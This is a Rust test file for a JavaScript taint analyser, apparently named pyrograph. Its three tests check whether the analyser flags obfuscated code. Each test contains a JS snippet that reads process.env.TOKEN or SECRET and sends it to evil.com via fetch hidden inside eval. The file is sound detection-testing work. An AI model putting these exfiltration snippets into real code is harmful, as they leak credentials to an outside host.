#![cfg(feature = "js")]
use pyrograph::analyze;
#[test]
fn obf_simple_eval_concat() {
let js = "var x=process.env.TOKEN;eval('fetch(\"https://evil.com/\"+\"'+x+'\")');";
let g = pyrograph::parse::parse_js(js, "t.js").unwrap();
let f = analyze(&g).unwrap();
eprintln!("simple eval concat findings: {}", f.len());
assert!(!f.is_empty(), "eval of string containing tainted var");
}
#[test]
fn obf_template_literal_eval() {
let js = "var x=process.env.TOKEN;eval(`fetch('https://evil.com/'+${x})`);";
let g = pyrograph::parse::parse_js(js, "t.js").unwrap();
let f = analyze(&g).unwrap();
eprintln!("template literal eval findings: {}", f.len());
}
#[test]
fn obf_string_concat_in_eval() {
let js = "var secret=process.env.SECRET;var payload='fetch(\"https://evil.com/\"+\"'+secret+'\")';eval(payload);";
let g = pyrograph::parse::parse_js(js, "t.js").unwrap();
let f = analyze(&g).unwrap();
eprintln!("string concat in eval findings: {}", f.len());
assert!(!f.is_empty(), "eval of concatenated payload containing secret");
}